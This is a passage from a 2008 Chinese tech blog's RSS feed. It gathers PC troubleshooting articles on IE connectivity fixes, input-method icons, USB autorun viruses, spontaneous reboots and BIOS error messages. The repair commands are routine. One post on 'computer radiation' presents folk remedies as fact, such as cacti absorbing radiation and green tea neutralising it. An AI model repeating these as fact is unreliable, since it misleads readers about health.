<P style="TEXT-INDENT: 2em">　　病毒和木马是不断“发展”的，我们也要不断学习新的防护知识，才能抵御病毒和木马的入侵。与其在感染病毒或木马后再进行查杀，不如提前做好防御工作，修筑好牢固的城墙进行抵御。养成良好的安全上网习惯，尽量不接触那些不安全的站点和下载不安全的软件、视频等，开机运行360和杀毒软件，备份一份安全的注册表文件，勤打补丁多学习，“防患于未然”才是我们应该追求的。</P>
<P style="TEXT-INDENT: 2em">　　PS：本文在书写过程中引用了网络上的一些内容，在此，对那些默默奉献出自己知识的无名朋友们表示感谢！</P>
<P style="TEXT-INDENT: 2em"></P></div>]]></description>
	    <author><![CDATA[ Hacker]]></author>
	    <comments>http://chaozanbk.blog.163.com/blog/static/50287111200821863159481</comments>
    <slash:comments>11</slash:comments>
    <guid isPermaLink="true">http://chaozanbk.blog.163.com/blog/static/50287111200821863159481</guid>
    <pubDate>Tue, 18 Mar 2008 18:31:59 +0800</pubDate>
    <dcterms:modified>2008-03-18T18:31:59+08:00</dcterms:modified>
  </item>    
  <item>
  	<title><![CDATA[IE无法打开网页的常见原因及解决！]]></title>	
    <link>http://chaozanbk.blog.163.com/blog/static/5028711120082105571522</link>
    <description><![CDATA[<div><P>&nbsp;</P>
<P><STRONG>文章并非原创</STRONG></P>
<P><STRONG>实在找不到文章的来源了，所以就不把原创作者给发上来了，希望作者谅解。</STRONG><BR></P>
<P><FONT color=#0000ff size=3></FONT>&nbsp;</P>
<P><FONT color=#0000ff size=3></FONT>&nbsp;</P>
<P>一、网络设置的问题 </P>
<P style="TEXT-INDENT: 2em">这种原因比较多出现在需要手动指定IP、网关、DNS服务器联网方式下，及使用代理服务器上网的。仔细检查计算机的网络设置。 </P>
<P style="TEXT-INDENT: 2em">二、DNS服务器的问题 </P>
<P style="TEXT-INDENT: 2em">当IE无法浏览网页时，可先尝试用IP地址来访问，如果可以访问，那么应该是DNS的问题，造成DNS的问题可能是连网时获取DNS出错或DNS服务器本身问题，这时你可以手动指定DNS服务（地址可以是你当地ISP提供的DNS服务器地址，也可以用其它地方可正常使用DNS服务器地址。）在网络的属性里进行，（控制面板―网络和拔号连接―本地连接―右键属性―TCP/IP协议―属性―使用下面的DNS服务器地址）。不同的ISP有不同的DNS地址。有时候则是路由器或网卡的问题，无法与ISP的DNS服务连接，这种情况的话，可把路由器关一会再开，或者重新设置路由器。 </P>
<P style="TEXT-INDENT: 2em">还有一种可能，是本地DNS缓存出现了问题。为了提高网站访问速度，系统会自动将已经访问过并获取IP地址的网站存入本地的DNS缓存里，一旦再对这个网站进行访问，则不再通过DNS服务器而直接从本地DNS缓存取出该网站的IP地址进行访问。所以，如果本地DNS缓存出现了问题，会导致网站无法访问。可以在“运行”中执行ipconfig /flushdns来重建本地DNS缓存。 </P>
<P style="TEXT-INDENT: 2em">三、IE浏览器本身的问题 </P>
<P style="TEXT-INDENT: 2em">当IE浏览器本身出现故障时，自然会影响到浏览了；或者IE被恶意修改破坏也会导致无法浏览网页。这时可以尝试用“黄山IE修复专家”来修复（建议到安全模式下修复），或者重新IE（如重装IE遇到无法重新的问题，可参考：附一解决无法重装IE） </P>
<P style="TEXT-INDENT: 2em">四、网络防火墙的问题 </P>
<P style="TEXT-INDENT: 2em">如果网络防火墙设置不当，如安全等级过高、不小心把IE放进了阻止访问列表、错误的防火墙策略等，可尝试检查策略、降低防火墙安全等级或直接关掉试试是否恢复正常。 </P>
<P style="TEXT-INDENT: 2em">五、网络协议和网卡驱动的问题 </P>
<P style="TEXT-INDENT: 2em">IE无法浏览，有可能是网络协议（特别是TCP/IP协议）或网卡驱动损坏导致，可尝试重新网卡驱动和网络协议。 </P>
<P style="TEXT-INDENT: 2em">六、HOSTS文件的问题 </P>
<P style="TEXT-INDENT: 2em">HOSTS文件被修改，也会导致浏览的不正常，解决方法当然是清空HOSTS文件里的内容。 </P>
<P style="TEXT-INDENT: 2em">七、系统文件的问题 </P>
<P style="TEXT-INDENT: 2em">当与IE有关的系统文件被更换或损坏时，会影响到IE正常的使用，这时可使用SFC命令修复一下，WIN98系统可在“运行”中执行SFC，然后执行扫描；WIN2000/XP/2003则在“运行”中执行sfc /scannow尝试修复。 </P>
<P style="TEXT-INDENT: 2em">其中当只有IE无法浏览网页，而QQ可以上时，则往往由于winsock.dll、wsock32.dll或wsock.vxd（VXD只在WIN9X系统下存在）等文件损坏或丢失造成，Winsock是构成TCP/IP协议的重要组成部分，一般要重装TCP/IP协议。但xp开始集成TCP/IP协议，所以不能像98那样简单卸载后重装，可以使用 netsh 命令重置 TCP/IP协议，使其恢复到初次安装操作系统时的状态。具体操作如下： </P>
<P style="TEXT-INDENT: 2em">点击“开始 运行”，在运行对话框中输入“CMD”命令，弹出命令提示符窗口，接着输入“netsh int ip reset c:\resetlog.txt”命令后会回车即可，其中“resetlog.txt”文件是用来记录命令执行结果的日志文件，该参数选项必须指定，这里指定的日志文件的完整路径是“c:\resetlog.txt”。执行此命令后的结果与删除并重新安装 TCP/IP 协议的效果相同。 </P>
<P style="TEXT-INDENT: 2em">小提示：netsh命令是一个基于命令行的脚本编写工具，你可以使用此命令配置和监视Windows 系统，此外它还提供了交互式网络外壳程序接口，netsh命令的使用格式请参看帮助文件（在令提示符窗口中输入“netsh/?”即可）。 </P>
<P style="TEXT-INDENT: 2em">第二个解决方法是修复以上文件，WIN9X使用SFC重新提取以上文件，WIN2000/XP/2003使用sfc /scannow命令修复文件,当用sfc /scannow无法修复时，可试试网上发布的专门针对这个问题的修复工具WinSockFix，可以在网上搜索下载。 </P>
<P style="TEXT-INDENT: 2em">八、杀毒软件的实时监控问题 </P>
<P style="TEXT-INDENT: 2em">这倒不是经常见，但有时的确跟实时监控有关，因为现在杀毒软件的实时监控都添加了对网页内容的监控。举一个实例：KV2005就会在个别的机子上会导致IE无法浏览网页（不少朋友遇到过），其具体表现是只要打开网页监控，一开机上网大约20来分钟后，IE就会无法浏览网页了，这时如果把KV2005的网页监控关掉，就一切恢复正常；经过彻底地重装KV2005也无法解决。虽然并不是安装KV2005的每台机子都会出现这种问题，毕竟每台机子的系统有差异，安装的程序也不一样。但如果出现IE无法浏览网页时，也要注意检查一下杀毒软件。 </P>
<P style="TEXT-INDENT: 2em">九、Application Management服务的问题 </P>
<P style="TEXT-INDENT: 2em">出现只能上QQ不能开网页的情况，重新启动后就好了。不过就算重新启动，开7到8个网页后又不能开网页了，只能上QQ。有时电信往往会让你禁用Application Management服务，就能解决了。具体原因不明。 </P>
<P style="TEXT-INDENT: 2em">十、感染了病毒所致 </P>
<P style="TEXT-INDENT: 2em">这种情况往往表现在打开IE时，在IE界面的左下框里提示：正在打开网页，但老半天没响应。在任务管理器里查看进程，（进入方法，把鼠标放在任务栏上，按右键―任务管理器―进程）看看CPU的占用率如何，如果是100%，可以肯定，是感染了病毒，这时你想运行其他程序简直就是受罪。这就要查查是哪个进程贪婪地占用了CPU资源．找到后，最好把名称记录下来，然后点击结束，如果不能结束，则要启动到安全模式下把该东东删除，还要进入注册表里，（方法：开始―运行，输入regedit）在注册表对话框里，点编辑―查找，输入那个程序名，找到后，点鼠标右键删除，然后再进行几次的搜索，往往能彻底删除干净。 </P>
<P style="TEXT-INDENT: 2em">有很多的病毒，杀毒软件无能为力时，唯一的方法就是手动删除。 </P>
<P style="TEXT-INDENT: 2em">十一、无法打开二级链接</P>
<P style="TEXT-INDENT: 2em">还有一种现象也需特别留意：就是能打开网站的首页，但不能打开二级链接，如果是这样，处理的方法是重新注册如下的DLL文件： </P>
<P style="TEXT-INDENT: 2em">在开始―运行里输入： </P>
<P style="TEXT-INDENT: 2em">regsvr32 Shdocvw.dll </P>
<P style="TEXT-INDENT: 2em">regsvr32 Shell32.dll（注意这个命令，先不用输） </P>
<P style="TEXT-INDENT: 2em">regsvr32 Oleaut32.dll </P>
<P style="TEXT-INDENT: 2em">regsvr32 Actxprxy.dll </P>
<P style="TEXT-INDENT: 2em">regsvr32 Mshtml.dll </P>
<P style="TEXT-INDENT: 2em">regsvr32 Urlmon.dll </P>
<P style="TEXT-INDENT: 2em">regsvr32 Msjava.dll </P>
<P style="TEXT-INDENT: 2em">regsvr32 Browseui.dll </P>
<P style="TEXT-INDENT: 2em">注意：每输入一条，按回车。第二个命令可以先不用输，输完这些命令后重新启动windows，如果发现无效，再重新输入一遍，这次输入第二个命令。</P>
<P style="TEXT-INDENT: 2em"></P></div>]]></description>
	    <author><![CDATA[ Hacker]]></author>
	    <comments>http://chaozanbk.blog.163.com/blog/static/5028711120082105571522</comments>
    <slash:comments>15</slash:comments>
    <guid isPermaLink="true">http://chaozanbk.blog.163.com/blog/static/5028711120082105571522</guid>
    <pubDate>Mon, 10 Mar 2008 17:57:15 +0800</pubDate>
    <dcterms:modified>2008-07-15T22:22:52+08:00</dcterms:modified>
  </item>    
  <item>
  	<title><![CDATA[找不到输入法图标，怎么办？]]></title>	
    <link>http://chaozanbk.blog.163.com/blog/static/502871112008127102617744</link>
    <description><![CDATA[<div><STRONG>使用电脑中，常常有意想不到的事情发生，我的输入法图标哪儿去了？如果你用的是Windows XP中，输入法图标也会莫名其妙地丢失，但在控制面板中却没有“输入法”，这时可以按以下方法尝试。<BR><BR></STRONG>方法1：在任务栏单击鼠标右键，弹出快捷菜单，把鼠标移动到“工具栏”上，会弹出子菜单，看看其中的“语言栏”有没有被选中，如果没有选中，单击选中“语言栏”，一般会显示输入法图标。 <BR><BR>　　方法2：依次单击“开始→设置→控制面板”，打开控制面板，在控制面板中单击“日期、时间、语言和区域设置”，单击“语言和区域设置”，弹出“语言和区域设置”对话框，单击“语言”标签，在“文字服务和输入语言”下单击“详细信息”按钮，弹出“文字服务和输入语言”对话框，单击“高级”标签，在“系统配置”下，把“关闭高级文字服务”前面的对号取消（看到下面的注释了没有，选中“会关闭语言栏”），单击“确定”按钮，输入法图标就回来了。 <BR><BR>　　方法3：点“开始→运行”，键入“msconfig”，单击“确定”或回车，运行“系统配置实用程序”，在“启动”里把“Ctfmon.exe”选中，单击“确定”，然后注销或重新启动应该就可以了。这是因为Ctfmon.exe控制Alternative User Input Text Processor (TIP)和Microsoft Office语言条，提供语音识别、手写识别、键盘、翻译和其它用户输入技术的支持。这个程序没有启动也会造成输入法图标不显示。 <BR><BR>　　<B>最后提示一下，没有输入法图标，用快捷键一样可以操作输入法。Ctrl+Space（空格键）是在中、英文输入法之间切换；按Ctrl+Shift组合键可以依次显示系统安装的输入法。</B><BR><BR>　　一般的，调至：智能ABC输入法的时候，右下角会出现：智能ABC的图标，还有一个“笔状”的图标，当“笔状”的图标只是一个“笔状”的时候，则不会出现“选字框”。 这个时候，你用鼠标点击一下，这个“笔状”的图标，选择：显示输入法状态栏。</div>]]></description>
	    <author><![CDATA[ Hacker]]></author>
	    <comments>http://chaozanbk.blog.163.com/blog/static/502871112008127102617744</comments>
    <slash:comments>8</slash:comments>
    <guid isPermaLink="true">http://chaozanbk.blog.163.com/blog/static/502871112008127102617744</guid>
    <pubDate>Wed, 27 Feb 2008 22:26:17 +0800</pubDate>
    <dcterms:modified>2008-02-27T22:26:17+08:00</dcterms:modified>
  </item>    
  <item>
  	<title><![CDATA[九招最有效防电脑辐射方法！IT工作者必看！]]></title>	
    <link>http://chaozanbk.blog.163.com/blog/static/502871112008122101524290</link>
    <description><![CDATA[<div><FONT color=#000000>第一招：在电脑旁放上几盆仙人掌，它可以有效地吸收辐射;<BR><BR>　　第二招：还对于生活紧张而忙碌的人群来说，抵御电脑辐射最简单的办法就是在每天上午喝2至3杯的绿茶，吃一个橘子。茶叶中含有丰富的维生素Ａ原，它被人体吸收后，能迅速转化为维生素Ａ。维生素Ａ不但能合成视紫红质，还能使眼睛在暗光下看东西更清楚，因此，绿茶不但能消除电脑辐射的危害，还能保护和提高视力。如果不习惯喝绿茶，菊花茶同样也能起着抵抗电脑辐射和调节身体功能的作用,螺旋藻、沙棘油也具有抗辐射的作用；<BR><BR>　　第三招：上网前先做好护肤隔离，如使用珍珠膜，独特的“南珠翠膜”在肌肤上形成一层0.001mm珍珠膜，可以有效防止污染环境的侵害和辐射;其次电脑使用后，脸上会吸附不少电磁辐射的颗粒，要及时用清水洗脸，这样将使所受辐射减轻70％以上！<BR><BR>　　第四招：操作电脑时最好在显示屏上安一块电脑专用滤色板以减轻辐射的危害，室内不要放置闲杂金属物品，以免形成电磁波的再次发射。使用电脑时，要调整好屏幕的亮度，一般来说，屏幕亮度越大，电磁辐射越强，反之越小。不过，也不能调得太暗，以免因亮度太小而影响效果，且易造成眼睛疲劳。<BR><BR>　　第五招:应尽可能购买新款的电脑，一般不要使用旧电脑，旧电脑的辐射一般较厉害，在同距离、同类机型的条件下，一般是新电脑的1－2倍。<BR><BR>　　第六招:电脑摆放位置很重要。尽量别让屏幕的背面朝着有人的地方，因为电脑辐射最强的是背面，其次为左右两侧，屏幕的正面反而辐射最弱。以能看清楚字为准，至少也要50厘米到75厘米的距离，这样可以减少电磁辐射的伤害。<BR><BR>　　第七招:注意室内通风：科学研究证实，电脑的荧屏能产生一种叫溴化二苯并呋喃的致癌物质。所以，放置电脑的房间最好能安装换气扇，倘若没有，上网时尤其要注意通风。<BR><BR>　　第八招:注意酌情多吃一些胡萝卜、豆芽、西红柿、瘦肉、动物肝等富含维生素A、C和蛋白质的食物，经常喝些绿茶等等。<BR><BR>　　第九招:经常在电脑前工作的人常会觉得眼睛干涩疼痛，所以，在电脑桌上放几支香蕉很有必要，香蕉中的钾可帮助人体排出多余的盐分，让身体达到钾钠平衡，缓解眼睛的不适症状。此外，香蕉中含有大量的β胡萝卜素，当人体缺乏这种物质时，眼睛就会变得疼痛、干涩、眼珠无光、失水少神，多吃香蕉不仅可减轻这些症状，还可在一定程度上缓解眼睛疲劳，避免眼睛过早衰老.</FONT><BR></div>]]></description>
	    <author><![CDATA[ Hacker]]></author>
	    <comments>http://chaozanbk.blog.163.com/blog/static/502871112008122101524290</comments>
    <slash:comments>27</slash:comments>
    <guid isPermaLink="true">http://chaozanbk.blog.163.com/blog/static/502871112008122101524290</guid>
    <pubDate>Fri, 22 Feb 2008 22:15:24 +0800</pubDate>
    <dcterms:modified>2008-02-22T22:15:24+08:00</dcterms:modified>
  </item>    
  <item>
  	<title><![CDATA[防病毒之最安全打开U盘的方法]]></title>	
    <link>http://chaozanbk.blog.163.com/blog/static/5028711120081204713103</link>
    <description><![CDATA[<div>为了避免电脑使用Ｕ盘时，通过双击，或者右击盘符时，导致把病毒感染至整个电脑，因此使用下面的方法，可使Ｕ盘病毒不被激活传播。 <BR><BR>　　在取消了U盘自动运行的情况下（在组策略中一定要关闭自动运行功能，否则只要一插上Ｕ盘，就会自动打开Ｕ盘使病毒传播）。 <BR><BR>　　插入U盘后， <BR><BR>　　在Windows操作系统中点击左下角“开始”——&gt;“运行”——&gt;输入“CMD”命令（进入DOS命令模式）——&gt;键入“G:”(举例G盘为U盘的盘符，此命令为进入Ｕ盘所在盘符)——键入“start .”(注意start 后面是一个点“.”此命令为打开Ｕ盘) <BR><BR>　　说明：现在的Ｕ盘病毒比较猖獗，在设计时，哪怕用户使用“资源管理器”打开Ｕ盘，也会激活病毒，此种打开Ｕ盘的方法，是一种非常规的打开方式，病毒的激活代码中并不会涉及到DOS中的内容，因此这种方法是目前打开Ｕ盘最安全的方法。</div>]]></description>
	    <author><![CDATA[ Hacker]]></author>
	    <comments>http://chaozanbk.blog.163.com/blog/static/5028711120081204713103</comments>
    <slash:comments>24</slash:comments>
    <guid isPermaLink="true">http://chaozanbk.blog.163.com/blog/static/5028711120081204713103</guid>
    <pubDate>Wed, 20 Feb 2008 16:07:13 +0800</pubDate>
    <dcterms:modified>2008-02-20T16:07:13+08:00</dcterms:modified>
  </item>    
  <item>
  	<title><![CDATA[开机后，任务栏变白，然后不断自动重启，的解决方法]]></title>	
    <link>http://chaozanbk.blog.163.com/blog/static/50287111200811501247367</link>
    <description><![CDATA[<div>一、软件 <BR><BR>1．病毒破坏 <BR><BR>自从有了计算机以后不久，计算机病毒也应运而生。当网络成为当今社会的信息大动脉后，病毒的传播更加方便，所以也时不时的干扰和破坏我们的正常工作。比较典型的就是前一段时间对全球计算机造成严重破坏的“冲击波”病毒，发作时还会提示系统将在60秒后自动启动。其实，早在DOS时代就有不少病毒能够自动重启你的计算机。 <BR><BR>对于是否属于病毒破坏，我们可以使用最新版的杀毒软件进行杀毒，一般都会发现病毒存在。当然，还有一种可能是当你上网时被人恶意侵入了你的计算机，并放置了木马程序。这样对方能够从远程控制你计算机的一切活动，当然也包括让你的计算机重新启动。对于有些木马，不容易清除，最好重新安装操作系统。 <BR><BR>2．系统文件损坏 <BR><BR>当系统文件被破坏时，如Win2K下的KERNEL32.DLL，Win98 FONTS目录下面的字体等系统运行时基本的文件被破坏，系统在启动时会因此无法完成初始化而强迫重新启动。你可以做个试验，把WIN98目录下的字库“FONTS”改名试一试。当你再次开机时，我们的计算机就会不断的重复启动。 <BR><BR>对于这种故障，因为无法进入正常的桌面，只能覆盖安装或重新安装。 <BR><BR>3．定时软件或计划任务软件起作用 <BR><BR>如果你在“计划任务栏”里设置了重新启动或加载某些工作程序时，当定时时刻到来时，计算机也会再次启动。对于这种情况，我们可以打开“启动”项，检查里面有没有自己不熟悉的执行文件或其他定时工作程序，将其屏蔽后再开机检查。当然，我们也可以在“运行”里面直接输入“Msconfig”命令选择启动项。 <BR><BR>二、硬件 <BR><BR>1．市电电压不稳 <BR><BR>一般家用计算机的开关电源工作电压范围为170V－240V，当市电电压低于170V时，计算机就会自动重启或关机。因为市电电压的波动我们有时感觉不到，所以就会误认为计算机莫名其妙的自动重启了。 <BR><BR>解决方法：对于经常性供电不稳的地区，我们可以购置UPS电源或130－260V的宽幅开关电源来保证计算机稳定工作。 <BR><BR>2．插排或电源插座的质量差，接触不良 <BR><BR>市面上的电源插排多数质量不好，内部的接点都是采用手工焊接，并且常采用酸性助焊剂，这样容易导致在以后的使用中焊点氧化引起断路或者火线和零线之间漏电。因为手工焊接，同时因为采用的磷黄铜片弹性差，用不了多长时间就容易失去弹性，致使与主机或显示器的电源插头接触不良而产生较大的接触电阻，在长时间工作时就会大量发热而导致虚接，这时就会表现为主机重新启动或显示器黑屏闪烁。 <BR><BR>还有一个可能是我们家里使用的墙壁插座，多数墙壁插座的安装都不是使用专业人员，所以插座内部的接线非常的不标准，特别这些插座如果我们经常使用大功率的电暖器时就很容易导致内部发热氧化虚接而形成间歇性的断电，引起计算机重启或显示器眨眼现象。 <BR><BR>解决方法： <BR><BR>① 不要图省钱而购买价廉不物美的电源排插，购买一些名牌的电源插排，因为其内部都是机器自动安装压接的，没有采用手工焊接。 <BR><BR>② 对于是否属于墙壁插座内部虚接的问题，我们可以把主机换一个墙壁插座试一试，看是否存在同样的自动重启问题。 <BR><BR><BR>页 <BR><BR>3．计算机电源的功率不足或性能差 <BR><BR>这种情况也比较常见，特别是当我们为自己主机增添了新的设备后，如更换了高档的显卡，增加了刻录机，添加了硬盘后，就很容易出现。当主机全速工作，比如运行大型的3D游戏，进行高速刻录或准备读取光盘，刚刚启动时，双硬盘对拷数据，就可能会因为瞬时电源功率不足而引起电源保护而停止输出，但由于当电源停止输出后，负载减轻，这时电源再次启动。因为保护后的恢复时间很短，所以给我们的表现就是主机自动重启。 <BR><BR>还有一种情况，是主机开关电源性能差，虽然电压是稳定的也在正常允许范围之内，但因为其输出电源中谐波含量过大，也会导致主机经常性的死机或重启。对于这种情况我们使用万用表测试其电压时是正常的，最好更换一台优良的电源进行替换排除。 <BR><BR>解决方法：现换高质量大功率计算机电源。 <BR><BR>4．主机开关电源的市电插头松动，接触不良，没有插紧 <BR><BR>这种情况，多数都会出现在DIY机器上，主机电源所配的电源线没有经过3C认证，与电源插座不配套。当我们晃动桌子或触摸主机时就会出现主机自动重启，一般还会伴有轻微的电打火的“啪啪”声。 <BR><BR>解决方法：更换优质的3C认证电源线。 <BR><BR>5．主板的电源ATX20插座有虚焊，接触不良 <BR><BR>这种故障不常见，但的确存在，主要是在主机正常工作时，左右移动ATX20针插头，看主机是否会自动重启。同时还要检查20针的电源插头内部的簧片是否有氧化现象，这也很容易导致接触电阻大，接触不良，引起主机死机或重启。有时还需要检查20针插头尾部的连接线，是否都牢靠。 <BR><BR>解决方法： <BR><BR>① 如果是主板焊点虚焊，直接用电烙铁补焊就可以了。注意：在对主板、硬盘、显卡等计算机板卡焊接时，一定要将电烙铁良好接地，或者在焊接时拔下电源插头。 <BR><BR>② 如果是电源的问题，最好是更换一台好的电源。 <BR><BR><BR>6．CPU问题 <BR><BR>CPU内部部分功能电路损坏，二级缓存损坏时，计算机也能启动，甚至还会进入正常的桌面进行正常操作，但当进行某一特殊功能时就会重启或死机，如画表，播放VCD，玩游戏等。 <BR><BR>解决办法：试着在CMOS中屏蔽二级缓存（L2）或一级缓存（L1），看主机是否能够正常运行；再不就是直接用好的CPU进行替换排除。如果屏蔽后能够正常运行，还是可以凑合着使用，虽然速度慢些，但必竟省钱了。 <BR><BR>7．内存问题 <BR><BR>内存条上如果某个芯片不完全损坏时，很有可能会通过自检（必竟多数都设置了POST），但是在运行时就会因为内存发热量大而导致功能失效而意外重启。多数时候内存损坏时开机会报警，但内存损坏后不报警，不加电的故障都还是有的。最好使用排除法，能够快速确定故障部位。 <BR><BR>8．光驱问题 <BR><BR>如果光驱内部损坏时，也会导致主机启动缓慢或不能通过自检，也可能是在工作过程中突然重启。对于后一种情况如果是我们更换了光驱后出现的，很有可能是光驱的耗电量不同而引起的。大家需要了解的是，虽然光驱的ATPI接口相同，但不同生产厂家其引脚定义是不相同的，如果我们的硬盘线有问题时，就可能产生对某一牌子光驱使用没有问题，但对其他牌子光驱就无法工作的情况，这需要大家注意。 <BR><BR>9．RESET键质量有问题 <BR><BR>如果RESET开关损坏，内部簧片始终处于短接的位置时，主机就无法加电自检。但是当RESET开关弹性减弱或机箱上的按钮按下去不易弹起时，就会出现在使用过程中，因为偶尔的触碰机箱或者在正常使用状态下而主机突然重启。所以，当RESET开关不能按动自如时，我们一定要仔细检查，最好更换新的RESET按钮开关或对机箱的外部按钮进行加油润滑处理。 <BR><BR>还有一种情况，是因为机箱内的RESET开关引线在焊接时绝缘层剥离过多，再加上使用过程中多次拆箱就会造成RESET开关线距离过近而引起碰撞，导致主机自动重启。 <BR><BR><BR>10．接入网卡或并口、串口、USB接口接入外部设备时自动重启 <BR><BR>这种情况一般是因为外设有故障，比如打印机的并口损坏，某一脚对地短路，USB设备损坏对地短路，网卡做工不标准等，当我们使用这些设备时，就会因为突然的电源短路而引起计算机重启。 <BR><BR>三、其他原因 <BR><BR>1．散热不良或测温失灵 <BR><BR>CPU散热不良，经常出现的问题就是CPU的散热器固定卡子脱落，CPU散热器与CPU接触之间有异物，CPU风扇长时间使用后散热器积尘太多，这些情况都会导致CPU散热不良，积聚温度过高而自动重启。 <BR><BR>还有就是CPU下面的测温探头损坏或P4 CPU内部的测温电路损坏，主板上的BIOS有BUG在某一特殊条件下测温不准，这些都会引起主机在工作过程中自动保护性重启。 <BR><BR>最后就是我们在CMOS中设置的CPU保护温度过低也会引起主机自动重启。 <BR><BR>2．风扇测速失灵 <BR><BR>当CPU风扇的测速电路损坏或测速线间歇性断路时，因为主板检测不到风扇的转速就会误以为风扇停转而自动关机或重启，但我们检查时可能看到CPU风扇转动正常，并且测速也正常。 <BR><BR>3．强磁干扰 <BR><BR>不要小看电磁干扰，许多时候我们的电脑死机和重启也是因为干扰造成的，这些干扰既有来自机箱内部CPU风扇、机箱风扇、显卡风扇、显卡、主板、硬盘的干扰，也有来自外部的动力线，变频空调甚至汽车等大型设备的干扰。如果我们主机的搞干扰性能差或屏蔽不良，就会出现主机意外重启或频繁死机的现象。 <BR><BR>计算机出现的问题千奇百怪，但如果我们能够了解计算机的基本工作原理，那我们在排除计算机的软硬件故障时就会得心应手，而不会天天头大了。希望本文能对大家有所帮助，请多多支持。</div>]]></description>
	    <author><![CDATA[ Hacker]]></author>
	    <comments>http://chaozanbk.blog.163.com/blog/static/50287111200811501247367</comments>
    <slash:comments>11</slash:comments>
    <guid isPermaLink="true">http://chaozanbk.blog.163.com/blog/static/50287111200811501247367</guid>
    <pubDate>Fri, 15 Feb 2008 12:12:47 +0800</pubDate>
    <dcterms:modified>2008-02-15T12:12:47+08:00</dcterms:modified>
  </item>    
  <item>
  	<title><![CDATA[开机自检BIOS语言详细：看了就有收获]]></title>	
    <link>http://chaozanbk.blog.163.com/blog/static/5028711120081144333655</link>
    <description><![CDATA[<div>开机自检时出现问题后会出现各种各样的英文短句，短句中包含了非常重要的信息，读懂这些信息可以自己解决一些小问题，可是这些英文难倒了一部分朋友，下面是一些常见的BIOS短句的解释，大家可以参考一下。<BR><BR>　　1.CMOSbatteryfailed<BR><BR>　　中文：CMOS电池失效。<BR><BR>　　解释：这说明CMOS电池已经快没电了，只要更换新的电池即可。<BR><BR>　　2.CMOSchecksumerror－Defaultsloaded<BR><BR>　　中文：CMOS执行全部检查时发现错误，要载入系统预设值。<BR><BR>　　解释：一般来说出现这句话都是说电池快没电了，可以先换个电池试试，如果问题还是没有解决，那么说明CMOSRAM可能有问题，如果没过一年就到经销商处换一块主板，过了一年就让经销商送回生产厂家修一下吧！<BR><BR>　　3.PressESCtoskipmemorytest<BR><BR>　　中文：正在进行内存检查，可按ESC键跳过。<BR><BR>　　解释：这是因为在CMOS内没有设定跳过存储器的第二、三、四次测试，开机就会执行四次内存测试，当然你也可以按ESC键结束内存检查，不过每次都要这样太麻烦了，你可以进入COMS设置后选择BIOSFEATURSSETUP，将其中的QuickPowerOnSelfTest设为Enabled，储存后重新启动即可。<BR><BR>　　4.Keyboarderrorornokeyboardpresent<BR><BR>　　中文：键盘错误或者未接键盘。<BR><BR>　　解释：检查一下键盘的连线是否松动或者损坏。<BR><BR>　　5.Harddiskinstallfailure<BR><BR>　　中文：硬盘安装失败。<BR><BR>　　解释：这是因为硬盘的电源线或数据线可能未接好或者硬盘跳线设置不当。你可以检查一下硬盘的各根连线是否插好，看看同一根数据线上的两个硬盘的跳线的设置是否一样，如果一样，只要将两个硬盘的跳线设置的不一样即可（一个设为Master，另一个设为Slave）。<BR><BR>　　6.Secondaryslavehardfail<BR><BR>　　中文：检测从盘失败<BR><BR>　　解释：可能是CMOS设置不当，比如说没有从盘但在CMOS里设为有从盘，那么就会出现错误，这时可以进入COMS设置选择IDEHDDAUTODETECTION进行硬盘自动侦测。也可能是硬盘的电源线、数据线可能未接好或者硬盘跳线设置不当，解决方法参照第5条。<BR><BR>　　7.FloppyDisk(s)fail或FloppyDisk(s)fail(80)或FloppyDisk(s)fail(40)<BR><BR>　　中文：无法驱动软盘驱动器。<BR><BR>　　解释：系统提示找不到软驱，看看软驱的电源线和数据线有没有松动或者是接错，或者是把软驱放到另一台机子上试一试，如果这些都不行，那么只好再买一个了，好在软驱还不贵。<BR><BR>　　8.Harddisk(s)diagnosisfail<BR><BR>　　中文：执行硬盘诊断时发生错误。<BR><BR>　　解释：出现这个问题一般就是说硬盘本身出现故障了，你可以把硬盘放到另一台机子上试一试，如果问题还是没有解决，只能去修一下了。<BR><BR>　　9.Memorytestfail<BR><BR>　　中文：内存检测失败。<BR><BR>　　解释：重新插拔一下内存条，看看是否能解决，出现这种问题一般是因为内存条互相不兼容,去换一条吧！<BR><BR>　　10.Overrideenable－Defaultsloaded<BR><BR>　　中文：当前CMOS设定无法启动系统，载入BIOS中的预设值以便启动系统<BR><BR>　　解释：一般是在COMS内的设定出现错误，只要进入COMS设置选择LOADSETUPDEFAULTS载入系统原来的设定值然后重新启动即可。<BR><BR>　　11.PressTABtoshowPOSTscreen<BR><BR>　　中文：按TAB键可以切换屏幕显示。<BR><BR>　　解释：有的OEM厂商会以自己设计的显示画面来取代BIOS预设的开机显示画面，我们可以按TAB键来在BIOS预设的开机画面与厂商的自定义画面之间进行切换。<BR><BR>　　12.Resumingfromdisk，PressTABtoshowPOSTscreen<BR><BR>　　中文：从硬盘恢复开机，按TAB显示开机自检画面）。<BR><BR>　　解释：这是因为有的主板的BIOS提供了Suspendtodisk(将硬盘挂起)的功能，如果我们用Suspendtodisk的方式来关机，那么我们在下次开机时就会显示此提示消息。<BR><BR>　　13.HarewareMonitorfoundanerror，enterPOWERMANAGEMENTSETUPfordetails，PressF1tocontinue，DELtoenterSETUP<BR><BR>　　中文：监视功能发现错误，进入POWERMANAGEMENTSETUP察看详细资料，按F1键继续开机程序，按DEL键进入COMS设置。<BR><BR>　　解释：有的主板具备硬件的监视功能，可以设定主板与CPU的温度监视、电压调整器的电压输出准位监视和对各个风扇转速的监视，当上述监视功能在开机时发觉有异常情况，那么便会出现上述这段话，这时可以进入COMS设置选择POWERMANAGEMENTSETUP，在右面的**FanMonitor**、**ThermalMonitor**和**VoltageMonitor**察看是哪部分发出了异常，然后再加以解决</div>]]></description>
	    <author><![CDATA[ Hacker]]></author>
	    <comments>http://chaozanbk.blog.163.com/blog/static/5028711120081144333655</comments>
    <slash:comments>8</slash:comments>
    <guid isPermaLink="true">http://chaozanbk.blog.163.com/blog/static/5028711120081144333655</guid>
    <pubDate>Thu, 14 Feb 2008 16:33:36 +0800</pubDate>
    <dcterms:modified>2008-02-14T16:33:36+08:00</dcterms:modified>
  </item>    
  <item>
  	<title><![CDATA[给你的电脑快速分区]]></title>	
    <link>http://chaozanbk.blog.163.com/blog/static/502871112007112763711682</link>
    <description><![CDATA[<div><P style="TEXT-INDENT: 2em">1.一分钟内分区及格式化硬盘</P>
<P style="TEXT-INDENT: 2em">右键点击“我的电脑”，选择“管理”命令。在打开的“计算机管理”窗口中，依次展开“计算机管理”→“存储”→“磁盘管理”项。之后，在右侧窗格中即可看到当前硬盘的分区情况。</P>
